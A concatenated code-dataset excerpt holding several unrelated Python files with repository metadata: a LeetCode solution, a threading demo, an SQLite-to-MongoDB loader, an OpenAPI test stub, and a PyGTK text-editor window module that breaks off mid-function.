from Exps_7_v3.doc3d.Ablation4_ch016_ep003.I_w_M_to_W_pyr.pyr_3s.L5.step09_3side_L5 import ch032_pyramid_1side_6__2side_6__3side_6 as I_w_M_to_W_Tcrop255_p20_3s_L5_good
import time
start_time = time.time()
###############################################################################################################################################################################################
#########################################################################################
ch032_pyramid_0side_and_1s6_2s6 = KModel_builder().set_model_name(MODEL_NAME.multi_flow_unet).set_multi_model_builders(op_type="I_to_Wxyz_to_Cxy_general", W_to_Cx_Cy=ch032_pyramid_0side, I_to_Wx_Wy_Wz=I_w_M_to_W_Tcrop255_p20_3s_L5_good).set_multi_model_separate_focus(I_to_W_separ=False, I_to_W_focus=True, W_to_C_separ=False, W_to_C_focus=True).set_gen_op( use_gen_op_p20 ).set_train_step( use_train_step_p20 )
#########################################################################################
###############################################################################################################################################################################################
if(__name__ == "__main__"):
import numpy as np
print("build_model cost time:", time.time() - start_time)
data = np.zeros(shape=(1, 512, 512, 1))
use_model = ch032_pyramid_0side
use_model = use_model.build()
result = use_model.generator(data, Mask=data)
print(result[0].shape)
from kong_util.tf_model_util import Show_model_weights
Show_model_weights(use_model.generator)
use_model.generator.summary()
| [
"[email protected]"
] | |
cf9a6b4197df455636515613c5824e6d9f7308fb | 58afefdde86346760bea40690b1675c6639c8b84 | /leetcode/next-greater-element-iii/282256643.py | f2f7254ab8ded0ed13d4530720a51054bf710131 | [] | no_license | ausaki/data_structures_and_algorithms | aaa563f713cbab3c34a9465039d52b853f95548e | 4f5f5124534bd4423356a5f5572b8a39b7828d80 | refs/heads/master | 2021-06-21T10:44:44.549601 | 2021-04-06T11:30:21 | 2021-04-06T11:30:21 | 201,942,771 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 733 | py | # title: next-greater-element-iii
# detail: https://leetcode.com/submissions/detail/282256643/
# datetime: Thu Nov 28 18:18:27 2019
# runtime: 28 ms
# memory: 12.7 MB
import bisect
class Solution:
def nextGreaterElement(self, n: int) -> int:
if n < 10:
return -1
digits = []
while n:
n, d = divmod(n, 10)
if not digits or d >= digits[-1]:
digits.append(d)
else:
i = bisect.bisect(digits, d)
digits[i], d = d, digits[i]
n = n * 10 + d
for d in digits:
n = n * 10 + d
return n if n <= (2 ** 31 - 1) else -1
return -1
| [
"[email protected]"
] | |
3a408a86fe1300ed34d82149434b6881b3685bb5 | 80ea03860dedce77e53594472385657bfcd5b6cd | /test/test_cons.py | 963ab07dd3c8c669dd3fa0ffbe02335e985d7c7f | [] | no_license | RelationalAI-oss/relationalai-sdk-python | 434f0531226367d7eccc66ab6c77caafafaa3ce5 | fdea5fdec84231ae0bb3f2bfd32ed84e962052ae | refs/heads/master | 2023-06-10T01:48:05.624101 | 2021-06-29T15:07:44 | 2021-06-29T15:07:44 | 379,428,666 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 922 | py | """
Delve Client SDK
This is a Client SDK for Delve API # noqa: E501
The version of the OpenAPI document: 1.1.3
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import rai_api
from rai_api.model.cons_all_of import ConsAllOf
from rai_api.model.linked_list import LinkedList
from rai_api.model.syntax_node import SyntaxNode
globals()['ConsAllOf'] = ConsAllOf
globals()['LinkedList'] = LinkedList
globals()['SyntaxNode'] = SyntaxNode
from rai_api.model.cons import Cons
class TestCons(unittest.TestCase):
"""Cons unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testCons(self):
"""Test Cons"""
# FIXME: construct object with mandatory attributes with example values
# model = Cons() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
9b57f8a69b3a2a57d25b3c849795e6816bdaf79f | 34cc1aeb6f7d0e612026905d12c85aeea989a83a | /host.py | ea56c1dc1b3f7bead8cf4ca8fd139af5b8e6233d | [] | no_license | mverzett/.bin | 83de7c0c0c16d75ca39df6c5ed95957f4ec79f9a | a1b652f5660c07690f61e79793372ad7e9d6099d | refs/heads/master | 2021-01-18T15:05:42.366559 | 2019-07-11T17:51:05 | 2019-07-11T17:51:05 | 8,330,975 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 755 | py | import os
host = os.environ['HOSTNAME']
public_html = ''
root_dir = ''
web_home = ''
#Site-dependent information
if 'wisc' in host:
public_html = '/afs/hep.wisc.edu/home/%s/public_html/' % os.environ['USER']
root_dir = 'public_html'
web_home = 'http://www.hep.wisc.edu/~mverzett'
elif 'cern.ch' in host:
initial = os.environ['USER'][0]
public_html = '/afs/cern.ch/user/%s/%s/www/' % (initial, os.environ['USER'])
root_dir = 'www'
web_home = 'https://mverzett.web.cern.ch/mverzett'
elif 'fnal.gov' in host:
public_html = os.path.join(os.environ['HOME'],'public_html')
root_dir = 'public_html'
web_home = 'http://home.fnal.gov/~%s' % os.environ['USER']
else:
raise ValueError("Site %s not recongnised!" % host)
| [
"[email protected]"
] | |
c34762a2d3793cb0cfb3c1d72c81137d5420837e | 663c108dca9c4a30b7dfdc825a8f147ba873da52 | /venv/multithreading/56InterThreadComEventObjectRemoveConsumerSleep.py | b926cace99d531efc0f3c545ed4a68c5d8f0d0b3 | [] | no_license | ksrntheja/08-Python-Core | 54c5a1e6e42548c10914f747ef64e61335e5f428 | b5fe25eead8a0fcbab0757b118d15eba09b891ba | refs/heads/master | 2022-10-02T04:11:07.845269 | 2020-06-02T15:23:18 | 2020-06-02T15:23:18 | 261,644,116 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 811 | py | from threading import *
import time
def producer(event):
print("Producer thread producing items:")
print("Producer thread giving notification by setting event")
event.set()
def consumer(event):
print('Consumer sleeping')
time.sleep(3)
print(t1.getName(), 'is active:', t1.isAlive())
print("Consumer thread is waiting for updation")
event.wait()
print("Consumer thread got notification and consuming items")
event = Event()
t1 = Thread(target=producer, args=(event,))
t2 = Thread(target=consumer, args=(event,))
t2.start()
t1.start()
# Consumer sleeping
# Producer thread producing items:
# Producer thread giving notification by setting event
# Thread-1 is active: False
# Consumer thread is waiting for updation
# Consumer thread got notification and consuming items
| [
"[email protected]"
] | |
be3ca6a59c8af3295105d05abd669f9eb2c92d43 | b042a014d668bd2d9e07bcfc756022137e5b0f97 | /module3-nosql-and-document-oriented-databases/assignment3.py | 2489aa19f8091748835faafd36ce7732de8ef74d | [
"MIT"
] | permissive | JeffreyAsuncion/DS-Unit-3-Sprint-2-SQL-and-Databases | 82895211b55b08b99e9c9c426f37cb04ba6f57c6 | 5d22fe0e2dd09c4130232b5f17c52e271d9b7f6b | refs/heads/master | 2022-11-24T10:48:13.916529 | 2020-08-01T05:06:58 | 2020-08-01T05:06:58 | 281,016,493 | 0 | 0 | null | 2020-07-20T04:51:39 | 2020-07-20T04:51:39 | null | UTF-8 | Python | false | false | 1,557 | py | # Store RPG data in our MongoDB instance
import os
import sqlite3
import pandas as pd
import pymongo
from dotenv import load_dotenv
from pymongo import MongoClient
from pdb import set_trace as breakpoint
#
# Part One: get data from 1. Sqlite or 2. Postgresql
#
DB_FILEPATH = os.path.join(os.path.dirname(__file__), "..", "rpg_db.sqlite3")
connection = sqlite3.connect(DB_FILEPATH)
print("CONNECTION:", connection)
cursor = connection.cursor()
print("CURSOR", cursor)
query = "SELECT * FROM charactercreator_character;"
results = cursor.execute(query).fetchall()
# print("RESULT", results) #> returns cursor object w/o results (need to fetch the results)
# print("type:", type(results))
#
# Prepare df
#
columns = ['character_id', 'name', 'level', 'exp', 'hp', 'strength', 'intelligence', 'dexterity', 'wisdom']
rpg_df = pd.DataFrame(results, columns=columns)
print(rpg_df.head())
#
# TODO: result to dict
#
rpg_dict = rpg_df.to_dict('records')
#
# TODO: create and insert to mongoDB
#
load_dotenv()
DB_USER = os.getenv("MONGO_USER", default="OOPS")
DB_PASSWORD = os.getenv("MONGO_PASSWORD", default="OOPS")
CLUSTER_NAME = os.getenv("MONGO_CLUSTER_NAME", default="OOPS")
connection_uri = f"mongodb+srv://{DB_USER}:{DB_PASSWORD}@{CLUSTER_NAME}.mongodb.net/test?retryWrites=true&w=majority"
print("\n----------------")
print("URI:", connection_uri)
client = pymongo.MongoClient(connection_uri)
#
# TODO: db.collection.insertMany({})
#
db = client.rpg_database
collection = db.charactercreator_character
collection.insert_many(rpg_dict) | [
"[email protected]"
] | |
56936c2628230019da57a06dab6a469fd426fba2 | b7b2f80ab5e1ee0ea028576e3014b62b8d3a8d7e | /pyedit/pyedit-009/pedwin.py | 8c09a2eb25c02fcc984578038fd24fbea4242150 | [] | no_license | pglen/pgpygtk | 4d1405478a714f003984cf3e3db04ff1f767470b | 33f58010e304f1a312f2356de453ecedb7aa21ef | refs/heads/master | 2021-01-22T01:18:52.238415 | 2019-01-01T01:37:24 | 2019-01-01T01:37:24 | 102,215,955 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 36,392 | py | #!/usr/bin/env python
import signal, os, time, sys
import gobject, gtk, gconf
import subprocess
import peddoc, pedconfig, pedofd
import pedync
# Into our namespace
from pedmenu import *
from pedui import *
from pedutil import *
STATUSCOUNT = 5 # Length of the styatus bar timeout (in sec)
treestore = None
notebook = None
#def scroll(aa, bb):
# print aa, bb
# -----------------------------------------------------------------------
# Create document
class edPane(gtk.VPaned):
def __init__(self, buff = [], focus = False):
pos = gconf.client_get_default().\
get_int(pedconfig.conf.config_reg + "/vpaned")
if pos == 0: pos = 120
gtk.VPaned.__init__(self)
self.set_border_width(5)
self.set_position(pos)
self.vbox = edwin(buff);
self.add2(self.vbox)
self.vbox2 = edwin(buff, True)
self.add1(self.vbox2)
# Shortcuts to access the editor windows
self.area = self.vbox.area
self.area2 = self.vbox2.area
# -----------------------------------------------------------------------
# Create main document widget with scroll bars
class edwin(gtk.VBox):
def __init__(self, buff, readonly = False):
global notebook, mained
gtk.VBox.__init__(self)
area = peddoc.pedDoc(buff, mained, readonly)
#print "created", area, mained
# Give access to notebook and main editor window
area.notebook = notebook
area.mained = mained
frame = gtk.Frame(); frame.add(area)
hbox = gtk.HBox()
hbox.pack_start(frame, True, True)
hbox.pack_end(area.vscroll, False, False)
self.pack_start(hbox, True, True)
self.pack_end(area.hscroll, False, False)
# Make it acessable:
self.area = area
# ------------------------------------------------------------------------
# Define Application Main Window claass
class EdMainWindow():
def __init__(self, fname, parent, names):
self.full = False
self.fcount = 0
self.statuscount = 0
self.alt = False
register_stock_icons()
global mained
mained = self
# Create the toplevel window
window = gtk.Window(gtk.WINDOW_TOPLEVEL)
self.window = window
www = gtk.gdk.screen_width(); hhh = gtk.gdk.screen_height();
if pedconfig.conf.full_screen:
window.set_default_size(www, hhh)
else:
xx = gconf.client_get_default().get_int(pedconfig.conf.config_reg + "/xx")
yy = gconf.client_get_default().get_int(pedconfig.conf.config_reg + "/yy")
ww = gconf.client_get_default().get_int(pedconfig.conf.config_reg + "/ww")
hh = gconf.client_get_default().get_int(pedconfig.conf.config_reg + "/hh")
if ww == 0 or hh == 0:
window.set_position(gtk.WIN_POS_CENTER)
window.set_default_size(7*www/8, 5*hhh/8)
window.move(www / 32, hhh / 10)
else:
window.set_default_size(ww, hh)
window.move(xx, yy)
window.set_icon_from_file(get_img_path("pyedit.png"))
merge = gtk.UIManager()
window.set_data("ui-manager", merge)
aa = create_action_group(self)
merge.insert_action_group(aa, 0)
window.add_accel_group(merge.get_accel_group())
try:
mergeid = merge.add_ui_from_string(ui_info)
except gobject.GError, msg:
print "Building menus failed: %s" % msg
# Add MRU
for cnt in range(6):
ss = "/sess_%d" % cnt
fname = gconf.client_get_default().get_string\
(pedconfig.conf.config_reg + ss)
if fname != "":
self.add_mru(merge, aa, fname, ss)
merge_id = merge.new_merge_id()
merge.add_ui(merge_id, "ui/MenuBar/FileMenu/SaveAs", "", None, gtk.UI_MANAGER_SEPARATOR, False)
mbar = merge.get_widget("/MenuBar")
mbar.show()
window.set_events( gtk.gdk.POINTER_MOTION_MASK |
gtk.gdk.POINTER_MOTION_HINT_MASK |
gtk.gdk.BUTTON_PRESS_MASK |
gtk.gdk.BUTTON_RELEASE_MASK |
gtk.gdk.KEY_PRESS_MASK |
gtk.gdk.KEY_RELEASE_MASK |
gtk.gdk.FOCUS_CHANGE_MASK )
#window.set_events( gtk.gdk.ALL_EVENTS_MASK)
global notebook
# Create note for the main window, give access to it for all
notebook = gtk.Notebook(); self.notebook = notebook
notebook.popup_enable()
notebook.set_scrollable(True)
#notebook.add_events(gtk.gdk.FOCUS_CHANGE_MASK)
notebook.add_events(gtk.gdk.ALL_EVENTS_MASK)
notebook.connect("switch-page", self.note_swpage_cb)
notebook.connect("focus-in-event", self.note_focus_in)
# Futile attempts
#notebook.connect("change-current-page", self.note_page_cb)
#notebook.connect("grab-focus", self.note_grab_focus_cb)
#notebook.connect("focus", self.note_focus_cb)
#notebook.connect("create-window", self.note_create_cb)
#notebook.connect("enter-notify-event", self.note_enter_notify)
window.connect("window_state_event", self.update_resize_grip)
window.connect("destroy", OnExit)
window.connect("key-press-event", self.area_key)
window.connect("key-release-event", self.area_key)
#window.connect("set-focus", self.area_focus)
window.connect("focus-in-event", self.area_focus_in)
window.connect("focus-out-event", self.area_focus_out)
window.connect("window-state-event", self.area_winstate)
#window.connect("area-focus-event", self.area_focus_in)
#window.connect("event", self.area_event)
#window.connect("enter-notify-event", self.area_enter)
#window.connect("leave-notify-event", self.area_leave)
#window.connect("event", self.unmap)
table = gtk.Table(2, 4, False)
window.add(table)
table.attach(mbar,
# X direction # # Y direction
0, 1, 0, 1,
gtk.EXPAND | gtk.FILL, 0,
0, 0);
tbar = merge.get_widget("/ToolBar"); tbar.set_tooltips(True)
tbar.show()
table.attach(tbar,
# X direction # # Y direction
0, 1, 1, 2,
gtk.EXPAND | gtk.FILL, 0,
0, 0)
hpaned = gtk.HPaned(); hpaned.set_border_width(5)
scroll = gtk.ScrolledWindow()
treeview = self.create_tree()
treeview.connect("row-activated", self.tree_sel)
treeview.connect("cursor-changed", self.tree_sel_row)
self.treeview = treeview
scroll.add(treeview)
frame2 = gtk.Frame(); frame2.add(scroll)
hpaned.add(frame2)
self.hpanepos = gconf.client_get_default(). \
get_int(pedconfig.conf.config_reg + "/hpaned")
if self.hpanepos == 0: self.hpanepos = 200
hpaned.set_position(self.hpanepos)
hpaned.pack2(notebook)
self.hpaned = hpaned
# Create statusbars
self.statusbar = gtk.Statusbar()
self.statusbar2 = gtk.Statusbar()
slab = gtk.Label(" ")
hpane2 = gtk.HPaned()
hpane2.set_position(self.get_width() - 250)
hpane2.pack2(self.statusbar2)
shbox = gtk.HBox()
shbox.pack_start(slab, False)
shbox.pack_start(self.statusbar)
hpane2.pack1(shbox)
# Main Pane
table.attach(hpaned,
# X direction Y direction
0, 1, 2, 3,
gtk.EXPAND | gtk.FILL, gtk.EXPAND | gtk.FILL,
0, 0)
table.attach(hpane2,
#table.attach(self.statusbar,
# X direction Y direction
0, 1, 3, 4,
gtk.EXPAND | gtk.FILL, 0,
0, 0)
window.show_all()
# ----------------------------------------------------------------
cnt = 0
# Read in buffers
for aa in names:
aaa = os.path.realpath(aa)
#print "loading file: ", aaa
vpaned = edPane()
ret = vpaned.area.loadfile(aaa)
if not ret:
self.update_statusbar("Cannot read file '{0:s}'".format(aaa))
continue
ret = vpaned.area2.loadfile(aaa)
cnt += 1
notebook.append_page(vpaned)
vpaned.area.set_tablabel()
if cnt == 0:
#print "No file on command line, creating new", os.getcwd()
fcnt = gconf.client_get_default().get_int\
(pedconfig.conf.config_reg + "/cnt")
# Load old session
for nnn in range(fcnt):
ss = "/sess_%d" % nnn
fff = gconf.client_get_default().get_string\
(pedconfig.conf.config_reg + ss)
#print "loading ", fff
vpaned = edPane()
ret = vpaned.area.loadfile(fff)
if not ret:
self.update_statusbar("Cannot read file '{0:s}'".format(fff))
continue
vpaned.area2.loadfile(fff)
notebook.append_page(vpaned)
vpaned.area.set_tablabel()
# Show newly created buffers:
window.show_all()
# Set last file
fff = gconf.client_get_default().get_string\
(pedconfig.conf.config_reg + "/curr")
#print "curr file", fff
cc = notebook.get_n_pages()
for mm in range(cc):
vcurr = notebook.get_nth_page(mm)
if vcurr.area.fname == fff:
#print "found buff", fff
notebook.set_current_page(mm)
self.window.set_focus(vcurr.vbox.area)
break
# Set the signal handler for 1s tick
signal.signal(signal.SIGALRM, handler)
signal.alarm(1)
self.update_statusbar("Initial")
# --------------------------------------------------------------------
def add_mru(self, merge, action_group, fname, mru):
sname = os.path.basename(fname)
#gtk.Action(name, label, tooltip, stock_id)
ac = gtk.Action(mru, sname, fname, None)
ac.connect('activate', self.activate_action)
action_group.add_action(ac)
merge_id = merge.new_merge_id()
#add_ui(merge_id, path, name, action, type, top)
merge.add_ui(merge_id, "/MenuBar/FileMenu/SaveAs", \
mru, mru, gtk.UI_MANAGER_MENUITEM, False)
def area_winstate(self, arg1, arg2):
pass
#print "area_winstate", arg1, arg2
#print "state", self.window.get_state()
def unmap(self, arg1, arg2):
print "unmap", arg1, arg2
def tree_sel_row(self, xtree):
sel = xtree.get_selection()
xmodel, xiter = sel.get_selected()
xstr = xmodel.get_value(xiter, 0)
vcurr = notebook.get_nth_page(notebook.get_current_page())
vcurr.area.locate(xstr)
def tree_sel(self, xtree, xiter, xpath):
pass
print "tree_sel", xtree, xiter, xpath
# Focus on main doc
vcurr = notebook.get_nth_page(notebook.get_current_page())
self.window.activate_focus()
self.window.set_focus(vcurr.vbox.area)
# Call key handler
def area_key(self, area, event):
pass
# Inspect key press before treeview gets it
if self.window.get_focus() == self.treeview:
# Do key down:
if event.type == gtk.gdk.KEY_PRESS:
if event.keyval == gtk.keysyms.Alt_L or \
event.keyval == gtk.keysyms.Alt_R:
self.alt = True;
if event.keyval >= gtk.keysyms._1 and event.keyval <= gtk.keysyms._9:
print "pedwin Alt num", event.keyval - gtk.keysyms._1
# Focus on main doc
vcurr = notebook.get_nth_page(notebook.get_current_page())
self.window.set_focus(vcurr.vbox.area)
elif event.type == gtk.gdk.KEY_RELEASE:
if event.keyval == gtk.keysyms.Alt_L or \
event.keyval == gtk.keysyms.Alt_R:
self.alt = False;
def get_height(self):
xx, yy = self.window.get_size()
return yy
def get_width(self):
xx, yy = self.window.get_size()
return xx
def start_tree(self):
global treestore
if not treestore:
treestore = gtk.TreeStore(str)
# Delete previous contents
try:
while True:
root = treestore.get_iter_first()
if not root:
break
try:
treestore.remove(root)
except:
print "Exception on rm treestore"
except:
print "strt_tree", sys.exc_info()
pass
piter = treestore.append(None, ["Extracting .."])
treestore.append(piter, ["None .."])
# --------------------------------------------------------------------
def create_tree(self, text = None):
global treestore
self.start_tree()
# create the TreeView using treestore
tv = gtk.TreeView(treestore)
# create a CellRendererText to render the data
cell = gtk.CellRendererText()
# create the TreeViewColumn to display the data
tvcolumn = gtk.TreeViewColumn('Functions')
# add the cell to the tvcolumn and allow it to expand
tvcolumn.pack_start(cell, True)
# set the cell "text" attribute to column 0 - retrieve text
# from that column in treestore
tvcolumn.add_attribute(cell, 'text', 0)
# add tvcolumn to treeview
tv.append_column(tvcolumn)
return tv
# --------------------------------------------------------------------
def update_treestore(self, text):
global treestore
if not treestore: return
# Delete previous contents
try:
while True:
root = treestore.get_iter_first()
if not root:
break
try:
treestore.remove(root)
except:
print "except: treestore remove"
except:
print "update_tree", sys.exc_info()
pass
if not text:
return
try:
for line in text:
piter = treestore.append(None, [cut_lead_space(line)])
except:
pass
#print sys.exc_info()
# --------------------------------------------------------------------
# Handlers:
def area_event(self, win, act):
print "pedwin area event", win, act
def area_leave(self, win, act):
pass
#print "pedwin area leave", win, act
def area_enter(self, win, act):
pass
#print "pedwin area enter", win, act
def area_focus(self, win, act):
pass
#print "pedwin area focus", win, act
def area_focus_in(self, win, act):
#print "area focus in", win, act
# This was needed as pygtk leaves the alt key hanging
pedconfig.conf.keyh.reset()
# Focus on main doc
vcurr = notebook.get_nth_page(notebook.get_current_page())
if vcurr:
self.window.set_focus(vcurr.vbox.area)
def area_focus_out(self, win, act):
pass
#print "area focus out", win, act
# Note message handlers:
def note_focus_in(self, win, act):
pass
#print "note_focus_in", win, act
vcurr = notebook.get_nth_page(notebook.get_current_page())
if vcurr:
self.window.set_focus(vcurr.vbox.area)
def note_enter_notify(self, win):
pass
#print "note_enter_notify", win
def note_grab_focus_cb(self, win):
#print "note_grab_focus_cb", win
vcurr = notebook.get_nth_page(notebook.get_current_page())
if vcurr:
self.window.set_focus(vcurr.vbox.area)
def note_swpage_cb(self, tabx, page, num):
#print "note_swpage", num
vcurr = tabx.get_nth_page(num)
self.window.set_title("pyedit: " + vcurr.area.fname);
self.window.set_focus(vcurr.vbox.area)
#self.update_statusbar("Switched to '{1:s}'".
# format(num, vcurr.area.fname))
def note_page_cb(self, tabx, child, num):
pass
#print "note_page"
def note_focus_cb(self, tabx, foc):
#print "note_focus_cb"
vcurr = notebook.get_nth_page(notebook.get_current_page())
if vcurr:
self.window.set_focus(vcurr.vbox.area)
def note_create_cb(self, tabx, page, xx, yy):
pass
#print "note_create"
# Note message handlers end
def activate_qhelp(self, action):
self.update_statusbar("Showing quick help")
try:
rr = get_exec_path("QHELP")
#pid = os.spawnlp(os.P_NOWAIT, "pangview.py", "pangview", rr)
ret = subprocess.Popen(["pangview.py", rr])
except:
pedync.message("\n Cannot launch the pangview.py utility. \n\n"
" (Please install)")
def activate_about(self, action):
self.update_statusbar("Showing About Dialog")
pedync.about()
def activate_action(self, action):
#dialog = gtk.MessageDialog(None, gtk.DIALOG_DESTROY_WITH_PARENT,
# gtk.MESSAGE_INFO, gtk.BUTTONS_CLOSE,
# 'Action: "%s" of type "%s"' % (action.get_name(), type(action)))
# Close dialog on user response
#dialog.connect ("response", lambda d, r: d.destroy())
#dialog.show()
strx = action.get_name()
#print "activate_action", strx
if strx == "New":
# Find non existing file
cnt = self.fcount + 1; fff = ""
base, ext = os.path.splitext(pedconfig.conf.UNTITLED)
while True:
fff = "%s_%d.txt" % (base, cnt)
#print fff
if not os.path.isfile(fff):
break;
cnt += 1
self.fcount = cnt
# Touch
#open(fff, "w").close()
vpaned = edPane([])
vpaned.area.fname = os.path.realpath(fff)
global notebook
notebook.append_page(vpaned)
vpaned.area.set_tablabel()
#label = gtk.Label(" " + os.path.basename(aa) + " ")
#notebook.set_tab_label(vpaned, label)
self.window.show_all()
# Make it current
nn = notebook.get_n_pages();
if nn:
vcurr = notebook.set_current_page(nn-1)
vcurr = notebook.get_nth_page(nn-1)
self.window.set_focus(vcurr.vbox.area)
if strx == "Open":
#print "open"
# Traditional open file
'''but = "Cancel", gtk.BUTTONS_CANCEL, "Open File", gtk.BUTTONS_OK
fc = gtk.FileChooserDialog("Open file", self.window, \
gtk.FILE_CHOOSER_ACTION_OPEN, but)
fc.set_default_response(gtk.BUTTONS_OK)
fc.connect("response", self.done_open_fc)
#fc.set_current_name(self.fname)
fc.run() '''
# Simplified
fname = pedofd.ofd("")
if fname != "":
self.openfile(fname)
if strx == "Save":
vcurr = notebook.get_nth_page(notebook.get_current_page())
vcurr.area.save()
if strx == "SaveAs":
vcurr = notebook.get_nth_page(notebook.get_current_page())
vcurr.area.saveas()
if strx == "Close":
self.closedoc()
if strx == "Copy":
#print "copy"
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
if vcurr2:
pedconfig.conf.keyh.act.ctrl_c(vcurr2.area)
if strx == "Cut":
#print "cut"
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
if vcurr2:
pedconfig.conf.keyh.act.ctrl_x(vcurr2.area)
if strx == "Paste":
#print "paste"
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
if vcurr2:
pedconfig.conf.keyh.act.ctrl_v(vcurr2.area)
if strx == "Goto":
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
if vcurr2:
pedconfig.conf.keyh.act.alt_g(vcurr2.area)
if strx == "Find":
print "find"
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
if vcurr2:
pedconfig.conf.keyh.act.ctrl_f(vcurr2.area)
if strx == "Record":
#print "record"
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
if vcurr2:
pedconfig.conf.keyh.act.f7(vcurr2.area)
if strx == "Play":
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
if vcurr2:
pedconfig.conf.keyh.act.f8(vcurr2.area)
if strx == "Animate":
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
if vcurr2:
pedconfig.conf.keyh.act.f8(vcurr2.area, True)
if strx == "Undo":
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
if vcurr2:
pedconfig.conf.keyh.act.ctrl_z(vcurr2.area)
if strx == "Redo":
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
if vcurr2:
pedconfig.conf.keyh.act.ctrl_y(vcurr2.area)
if strx == "SaveAll":
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
if vcurr2:
pedconfig.conf.keyh.act.alt_a(vcurr2.area)
if strx == "Discard Undo":
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
if vcurr2:
vcurr2.area.delundo()
if strx == "NextWin":
self.nextwin()
if strx == "PrevWin":
self.prevwin()
if strx.find("/sess_") >= 0:
fname = gconf.client_get_default().get_string\
(pedconfig.conf.config_reg + strx)
self.openfile(fname)
if strx == "Help":
#pedync.message("\n Help: Work in progress \n")
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
if vcurr2:
pedconfig.conf.keyh.act.f1(vcurr2.area)
if strx == "Settings":
pedync.message("\n Settings: Work in progress \n")
def closedoc(self):
cc = notebook.get_n_pages()
nn = notebook.get_current_page()
vcurr = notebook.get_nth_page(nn)
# Disable close
if vcurr.area.closedoc():
return
# Wrap around
if nn == 0: mm = cc - 1
else: mm = nn - 1
notebook.set_current_page(mm)
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
self.window.set_focus(vcurr2.vbox.area)
notebook.remove_page(nn)
self.window.show_all()
def firstwin(self):
cc = notebook.get_n_pages()
if cc == 0:
return
notebook.set_current_page(0)
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
self.window.set_focus(vcurr2.vbox.area)
self.window.show_all()
def lastwin(self):
cc = notebook.get_n_pages()
if cc == 0:
return
notebook.set_current_page(cc-1)
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
self.window.set_focus(vcurr2.vbox.area)
self.window.show_all()
def nextwin(self):
cc = notebook.get_n_pages()
nn = notebook.get_current_page()
vcurr = notebook.get_nth_page(nn)
# Wrap around if needed
if nn == cc - 1: return # mm = 0
else: mm = nn + 1
notebook.set_current_page(mm)
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
self.window.set_focus(vcurr2.vbox.area)
self.window.show_all()
def prevwin(self):
cc = notebook.get_n_pages()
nn = notebook.get_current_page()
vcurr = notebook.get_nth_page(nn)
# Wrap around if needed
if nn == 0: return # mm = cc - 1
else: mm = nn - 1
notebook.set_current_page(mm)
nn2 = notebook.get_current_page()
vcurr2 = notebook.get_nth_page(nn2)
self.window.set_focus(vcurr2.vbox.area)
self.window.show_all()
'''def done_open_fc(self, win, resp):
#print "done_open_fc", win, resp
if resp == gtk.BUTTONS_OK:
fname = win.get_filename()
if not fname:
#print "Must have filename"
self.update_statusbar("No filename specified")
pass
else:
self.openfile(fname)
win.destroy()'''
def saveall(self):
#print "saveall"
# Save all files
nn = notebook.get_n_pages(); cnt = 0; cnt2 = 0
while True:
if cnt >= nn: break
ppp = notebook.get_nth_page(cnt)
if ppp.area.changed:
ppp.area.writefile()
cnt2 += 1
cnt += 1
self.update_statusbar("%d of %d buffers saved." % (cnt2, nn))
# -------------------------------------------------------------------
def openfile(self, fname):
# Is it already loaded? ... activate
nn = notebook.get_n_pages();
for aa in range(nn):
vcurr = notebook.get_nth_page(aa)
if vcurr.area.fname == fname:
self.update_statusbar("Already open, activating '{0:s}'".format(fname))
vcurr = notebook.set_current_page(aa)
vcurr = notebook.get_nth_page(aa)
self.window.set_focus(vcurr.vbox.area)
return
#print "opening '"+ fname + "'"
self.update_statusbar("Opening file '{0:s}'".format(fname))
vpaned = edPane()
ret = vpaned.area.loadfile(os.path.realpath(fname))
if not ret:
self.update_statusbar("Cannot read file '{0:s}'".format(fname))
return
vpaned.area2.loadfile(os.path.realpath(fname))
self.update_statusbar("Opened file '{0:s}'".format(fname))
# Add to the list of buffers
notebook.append_page(vpaned)
vpaned.area.set_tablabel()
self.window.show_all()
# Make it current
nn = notebook.get_n_pages();
if nn:
vcurr = notebook.set_current_page(nn-1)
vcurr = notebook.get_nth_page(nn-1)
self.window.set_focus(vcurr.vbox.area)
def activate_exit(self, action):
#print "activate_exit called"
OnExit(self.window)
def activate_quit(self, action):
#print "activate_quit called"
OnExit(self.window, False)
def activate_radio_action(self, action, current):
active = current.get_active()
value = current.get_current_value()
if active:
dialog = gtk.MessageDialog(self, gtk.DIALOG_DESTROY_WITH_PARENT,
gtk.MESSAGE_INFO, gtk.BUTTONS_CLOSE,
"You activated radio action: \"%s\" of type \"%s\".\nCurrent value: %d" %
(current.get_name(), type(current), value))
# Close dialog on user response
dialog.connect("response", lambda d, r: d.destroy())
dialog.show()
# This is the line count / pos status bar
def update_statusbar2(self, xx = 0, yy = 0, ins = 0, tlen = 0):
# Always update line / col
if ins: str2 = "INS"
else: str2 ="OVR"
strx2 = "Ln {0:d} Col {1:d} Tot {3:d} {2:s} ".\
format(yy, xx, str2, tlen)
self.statusbar2.pop(0)
self.statusbar2.push(0, strx2)
def update_statusbar(self, strx):
# Clear any previous message, underflow is allowed
